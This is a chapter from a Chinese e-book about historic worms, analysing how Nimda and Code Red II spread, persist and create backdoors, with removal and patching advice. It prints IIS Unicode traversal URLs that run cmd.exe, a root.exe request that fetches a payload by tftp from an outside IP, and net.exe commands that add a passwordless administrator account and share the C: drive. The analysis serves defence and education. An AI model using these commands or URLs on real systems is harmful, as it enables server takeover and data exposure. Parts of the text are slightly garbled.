友情提示:如果本网页打开太慢或显示不完整,请尝试鼠标右键“刷新”本网页!阅读过程发现任何错误请告诉我们,谢谢!! 报告错误
荣耀电子书 返回本书目录 我的书架 我的书签 TXT全本下载 进入书吧 加入书签

知者无畏--一个真实的簿世界-第章

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



临时文件夹中读取所有〃htm〃,〃html〃文件并从中提取电子邮件地址, 从信箱读取电子邮件地址并从中提取SMTP服务器,然后发送readme。eml,这可比仅仅通过outlook传播要厉害和隐蔽得多。 
(二)通过微软的unicode漏洞
在IIS 4。0和IIS 5。0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
  对于IIS 5。0/4。0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如〃%c1%hh〃或者〃%c0%hh〃;它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00 (0xc1 … 0xc0) * 0x40 + 0xhh
%c0%hh …》 (0xc0 … 0xc0) * 0x40 + 0xhh
  因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c …》 (0xc1 … 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f …》 (0xc0 … 0xc0) * 0x40 + 0x2f = 0x2f = ''
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。 
如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
列出当前目录的内容:
victim/scripts/。。%c1%1c。。/winnt/system32/cmd。exe?/c+dir
利用这个漏洞查看系统文件内容也是可能的:
victim/a。asp/。。%c1%1c。。/。。%c1%1c。。/winnt/win。ini
(三)通过红色代码二代建立的root。exe 
红色代码二代会在IIS的几个可执行目录下放置root。exe 
也是尽人皆知,Nimda首先在udp/69上启动一个tftp服务器 
然后会作以下扫描 

一旦发现有弱点的系统就使用类似下面的命令 
GET /scripts/root。exe?/c+tftp …i xxx。xxx。xxx。xxx GET Admin。dll HTTP/1。0 
把文件传到主机上去,然后再GET /scripts/Admin。dll HTTP/1。0 
(四)通过WWW服务 在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件 所在目录中创建readme。eml,并在文件末加上下面这一行 window。open(〃readme。eml〃; null; 〃resizable=no;top=6000;left=6000〃) 
也就是说如果一台web服务器被感染了,那么大部分访问过此服务器的机器都会被感染。 
(五)通过局域网 
Nimda会搜索本地的共享目录中包含doc文件的目录,一但找到,就会把自身复制到目录中命名为riched20。dll(原理见前) 
(六)以病毒的方式 
搜索'SOFTWAREMicrosoftWindowsCurrentVersionApp Paths'寻找在远程主机上的可执行文件, 一旦找到,Nimda就会以病毒的方式感染文件。有一点不同的是,它把原文件作为资源存储在新文件中, 运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32。exe,它不会感染winzip32。exe, 应该是作者发现winzip染毒后不能正常运行,就过滤掉这个使用最为广泛的压缩程序。 

如何运行的: 
病毒采取以下措施确保自己在系统一开机之后就运行:
1)把自己复制到windows系统文件夹里命名为riched20。dll(原理见前) 
2)把自己复制到windows系统文件夹里命名为load。exe, 
修改system。ini把 
shell=explorer。exe改为 
shell=explorer。exe load。exe …dontrunold 
使病毒在下次系统启动时运行。 

安全灾难—创建后门: 
1) 如果有足够权限将调用〃net。exe〃执行以下系统命令: 
net user guest /add  增加一个guest用户
net user guest /active 激活guest用户
net user guest 〃〃  guest用户的密码为空
net localgroup Administrators guest 将guest加到管理员组中!太可怕了。
net localgroup Guests guest /add 
结果是空密码的guest加到了Administrators组中。 

2)如果有足够权限将调用〃net。exe〃执行以下系统命令: 
net share c=c: 
删除'SYSTEMCurrentControlSetServiceslanmanserverSharesSecurity'的所有子键 
结果是C:设为完全共享。 

作者是谁? 
程序的作者在程序中留下了以下标记: 
fsdhqherwqi2001 
Concept Virus(CV) V。5; Copyright(C)2001 R。P。China 
可能对最终找出作者有帮助。 
从这些信息来看,似乎作者来自中国,但是在作者没有站出来承认之前,这些文字可以使任何人加在病毒代码里的。

为什么说尼姆达是〃概念〃蠕虫? 
它可以通过至少六种方式传播 
它是一个带exe扩展名的dll,可以做为可执行文件运行,也可作为dll运行。 
它有智慧:当它名为Admin。dll被运行时,它会把自己复制到windows文件夹命名为mmc。exe并带上参数〃…qusery9bnow〃运行。 
当它名为readme。exe被运行时,它会把自己复制到%temp%带上参数〃…dontrunold〃运行。 
它会把自己的属性设为〃系统〃〃隐藏〃,再改写注册表,使〃系统〃〃隐藏〃属性的程序在资源管理器中不可见。 
它是一个主机扫描器,一个弱点扫描器,一个后门程序;带有多个漏洞,掌握最新的安全信息;它就是一个黑客,人们把它称为“瑞士军刀”不是没有道理的。 

如何清除尼姆达病毒? 
在文件夹选项里设置〃显示所有文件〃 
删除mmc。exe/load。exe/riched20。dll/admin。dll/readme。eml/readme。exe等所有蠕虫文件。 
从原始安装盘中提取riched20。dll覆盖windows系统文件夹里的同名蠕虫文件。 
检查所有大小为57344或79225的文件。 
可以使用〃查找〃工具,搜索包含〃fsdhqherwqi2001〃的*。exe/*。dll和包含〃Kz29vb29oWsrLPh4eisrPb09Pb2〃的*。eml/*。nws。 
检查system。ini,去掉自动执行load。exe文件的行。 
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。 
删除C:的共享 
重起系统 

如何避免Nimda入侵?


根本之道是打补丁: 
Unicode漏洞:microsoft/technet/security/bulletin/ms00…078。asp 
MIME漏洞:microsoft/technet/security/bulletin/ms01…020。asp 
IE5。01 SP2:microsoft/windows/ie/downloads/remended/ie501sp2/default。asp 
IE5。5 SP2:microsoft/windows/ie/downloads/remended/ie501sp2/default。asp 

其他解决方案: 
打开IE的〃工具》internet选项》安全》自定义级别》文件下载〃选〃禁用〃。 
删除所有不需要的默认虚拟目录,或者只给纯脚本执行权,最好不要把任何web目录放在系统分区。 
检查共享设置,Win9X的机器不要开完全共享,可以开只读共享,所有共享都要设置口令。 由于尼姆达可以利用红色代码二代创建的后门,所以需打上针对红色代码二代的补丁,
检查C:和D: 有没有explorer。exe,检查web目录中有没有root。exe。 
第二节 红色代码是红色的吗?
你知道吗,在“红色代码”流行之前,已经出现过“绿色代码”,而在“红色代码”之后,又出现了“蓝色代码”,这些五颜六色的东西的出现,仿佛宣告电脑病毒已经成为一种时尚,就像穿衣服有流行色一样,似乎病毒也有了自己的流行色。
实际上,从某种意义上,杀毒软件厂商对一种病毒进行分析之后,将其命名为“绿色代码”应该是引导这场时尚的先锋,因为这种命名,病毒作者故意在新的病毒里面包括了类似“Code Red”之类的字符,让病毒的发现者命名它为“红色代码”,病毒和反病毒共同引导了这场颜色的革命。
红色代码有一代和二代两种,我们重点分析二代:
红色代码二代于2001年8月首次发现,它是“红色代码”病毒的一个变种。 
和“红色代码”一样,它也是利用缓冲区溢出传播到其他web服务器。由于收到了大量的因特网信息服务器(IIS Server)被感染的报告。我们把“红色代码二代”定为高度危险。
最早的“红色代码”曾经成功的攻击了白宫的主页,导致其拒绝服务。更进一步,“红色代码二代”可以使黑客在远程取得对服务器的完全控制。如果你使用因特网信息服务器(IIS Server);强烈建议你下载微软的关于〃红色代码二代〃的最新补丁:你可以在microsoft/technet/security/bulletin/MS01…033。asp 找到这个补丁。
当一个web 服务器被感染后,病毒的主线程检查两个标记,一个叫〃29A〃;用来确定是否安装Trojan。VirtualRoot;另一个标记是一个信号灯;这个信号灯的名字叫“红色代码二代”(Code Red II);如果这个信号灯存在,病毒就进入休眠状态。接下来,主线程检查系统的的缺省语种,如果是中文(包括简体和繁体),就创建600个线程,否则就创建300个线程(气死我了,为什么我们中国人的服务器要多创建一些线程?);这些线程产生随机IP地址,用来搜索新的因特网服务器,当这些线程开始工作之后,主线程把视窗 NT/2000系统目录下的cmd。exe 拷贝到下面一个存在的位置,
c:inetpubscriptsroot。exe
d:inetpubscriptsroot。exe 
c:progra~1mon~1systemMSADCroot。exe 
d:progra~1mon~1systemMSADCroot。exe 
如果它携带的特洛伊木马能够修改下面的注册表:HKLMSYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots 
这将使得黑客可通过向因特网服务器发送HTTP协议的GET 请求运行 scripts/root。ex
返回目录 上一页 下一页 回到顶部 1 1
未阅读完?加入书签已便下次继续阅读!
温馨提示: 温看小说的同时发表评论,说出自己的看法和其它小伙伴们分享也不错哦!发表书评还可以获得积分和经验奖励,认真写原创书评 被采纳为精评可以获得大量金币、积分和经验奖励哦!